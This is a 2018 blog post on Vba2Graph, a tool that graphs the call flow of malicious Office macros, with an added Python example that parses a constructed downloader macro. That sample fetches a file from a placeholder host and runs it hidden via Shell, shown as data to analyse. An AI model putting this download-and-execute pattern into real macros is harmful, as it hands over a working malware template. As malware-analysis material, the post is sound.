Thursday, 30 August 2018

Vba2Graph- A Tool For Security Researchers For Malware Analysis


Vba2Graph: a tool for security researchers doing malware analysis.

It generates a VBA call graph from the macros in a malicious Office document, allowing quick analysis of malicious macros and an easy understanding of their execution flow. Developed by @MalwareCantFly.

Features


  • Keyword highlighting
  • VBA Properties support
  • External function declaration support
  • Tricky macros with "_Change" execution triggers
  • Fancy color schemes

Pros

    ✓ Pretty fast

    ✓ Works well on most malicious macros observed in the wild


Cons

    ✗ Static analysis only (dynamically resolved calls, e.g. a callee whose name is only built at run time, are not recognized)
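To make the features and the static-analysis caveat above concrete, here is an added example of the kind of graph construction the tool performs. It is my own illustration, not vba2graph's code, and the heuristics (a `_Change` handler is linked from any assignment to that control's properties; `CallByName` and `Application.Run` are flagged as unresolved dynamic calls) are assumptions about how such a tool works, not a description of vba2graph's implementation. The VBA input is a constructed sample shaped like olevba's decompiled-macro output, not a real in-the-wild document; `example.invalid` is a reserved placeholder host.

```python
import re
from collections import defaultdict

# Constructed sample shaped like olevba output: a Resize -> TextBox_Change
# trigger chain, an external declaration, and one CallByName hop whose
# callee name only exists at run time. Not a real malicious document.
SAMPLE_VBA = """\
Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" (ByVal a As LongPtr, ByVal u As String, ByVal f As String, ByVal r As Long, ByVal c As LongPtr) As Long

Private Sub UserForm_Resize()
    TextBox1.Text = "go"
End Sub

Private Sub TextBox1_Change()
    Call Stage2
End Sub

Sub Stage2()
    Dim p As String
    p = Environ("TEMP") & "\\a.exe"
    Fetch "http://example.invalid/x", p
    CallByName Me, "Launch", VbMethod, p   ' callee name only exists at run time
End Sub

Sub Fetch(url As String, path As String)
    URLDownloadToFileA 0, url, path, 0, 0
End Sub

Sub Launch(path As String)
    Shell path, vbHide
End Sub
"""

PROC_RE = re.compile(r"^\s*(?:(?:Private|Public|Friend)\s+)?(?:Static\s+)?(?:Sub|Function)\s+(\w+)", re.I)
DECL_RE = re.compile(r"^\s*(?:(?:Private|Public)\s+)?Declare\s+(?:PtrSafe\s+)?(?:Sub|Function)\s+(\w+)\s+Lib\s+\"(\w+)", re.I)
END_RE = re.compile(r"^\s*End\s+(?:Sub|Function)\b", re.I)
ASSIGN_RE = re.compile(r"^\s*(\w+)\.\w+\s*=")          # e.g. TextBox1.Text = ...
DYN_RE = re.compile(r"\b(?:CallByName|Application\.Run)\b", re.I)
TRIGGER_SUFFIXES = ("_Change", "_Resize", "_Click", "_Open")
AUTO_MACROS = {"AutoOpen", "AutoExec", "AutoClose", "Auto_Open", "Document_Open", "Workbook_Open"}

def parse_module(src):
    """Split VBA text into {proc: [body lines]} and {extern name: library}."""
    procs, externs, cur = {}, {}, None
    for line in src.splitlines():
        if (m := DECL_RE.match(line)):
            externs[m.group(1)] = m.group(2)
        elif (m := PROC_RE.match(line)):
            cur = m.group(1)
            procs[cur] = []
        elif END_RE.match(line):
            cur = None
        elif cur is not None:
            procs[cur].append(line)
    return procs, externs

def build_graph(procs, externs):
    """Static call edges, plus assignment-to-control edges into *_Change handlers."""
    names = set(procs) | set(externs)
    graph, dynamic = defaultdict(list), []
    for caller, body in procs.items():
        for raw in body:
            code = re.sub(r'"[^"]*"', '""', raw).split("'", 1)[0]  # drop literals, then comments
            if DYN_RE.search(code):
                dynamic.append((caller, raw.strip()))  # cannot be resolved statically
            callees = [t for t in re.findall(r"\b\w+\b", code) if t in names and t != caller]
            if (m := ASSIGN_RE.match(code)) and f"{m.group(1)}_Change" in procs:
                callees.append(f"{m.group(1)}_Change")  # property write fires the control's _Change event
            for c in callees:
                if c not in graph[caller]:
                    graph[caller].append(c)
    return dict(graph), dynamic

def is_trigger(name):
    return name in AUTO_MACROS or name.endswith(TRIGGER_SUFFIXES)

def unreachable(graph, procs):
    """Procedures with no static caller and no trigger: candidates for dynamic invocation."""
    targets = {d for ds in graph.values() for d in ds}
    return sorted(n for n in procs if n not in targets and not is_trigger(n))

def to_dot(graph, procs, externs):
    lines = ["digraph vba {"]
    for n in procs:
        lines.append(f'  "{n}" [shape={"box" if is_trigger(n) else "ellipse"}];')
    for n, lib in externs.items():
        lines.append(f'  "{n}" [shape=note label="{n}\\n({lib})"];')
    for src, dsts in graph.items():
        lines.extend(f'  "{src}" -> "{d}";' for d in dsts)
    lines.append("}")
    return "\n".join(lines)

def analyze(src=SAMPLE_VBA):
    procs, externs = parse_module(src)
    graph, dynamic = build_graph(procs, externs)
    return {"graph": graph, "dynamic": dynamic,
            "unreachable": unreachable(graph, procs), "dot": to_dot(graph, procs, externs)}

if __name__ == "__main__":
    r = analyze()
    print(r["dot"])                       # feed to: dot -Tpng -o graph.png
    print("dynamic calls:", r["dynamic"])
    print("no static caller:", r["unreachable"])
```

Run as-is and the DOT output shows the chain UserForm_Resize -> TextBox1_Change -> Stage2 -> Fetch -> URLDownloadToFileA, while Launch appears with no incoming edge: the `CallByName` in Stage2 is reported as a dynamic call but its target cannot be wired into the graph, which is exactly the limitation the Cons entry describes. When triaging real output, treat every procedure with no caller and no trigger as a likely dynamic target rather than dead code.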

Examples

Example 1:

Trickbot downloader, which uses an object Resize event as the initial trigger, followed by TextBox_Change triggers. [graph image not reproduced here]

Example 2:

[graph image not reproduced here]

Installation

Install oletools:

https://github.com/decalage2/oletools/wiki/Install

Install Python Requirements

pip install -r requirements.txt

Install Graphviz

For Windows
Install Graphviz msi:

https://graphviz.gitlab.io/_pages/Download/Download_windows.html

Add "dot.exe" to PATH env variable or just:

set PATH=%PATH%;C:\Program Files (x86)\Graphviz2.38\bin

For Mac
brew install graphviz

Ubuntu
sudo apt-get install graphviz

Arch
sudo pacman -S graphviz

Usage (All Platforms)

olevba malicious.doc | python vba2graph.py -c 1

python vba2graph.py -i olevba_output.bas -o output_folder

Output

You'll get 3 folders in your output folder:

  • png: the actual graph image you are looking for
  • dot: the dot file which was used to create the graph image
  • bas: the VBA functions code that was recognized by the script (for debugging)

Batch Processing

Mac/Linux:
A batch.sh script is included for running olevba and vba2graph over an input folder of malicious documents.

Note that it deletes the output directory before it starts; use with caution.


Download Vba2Graph
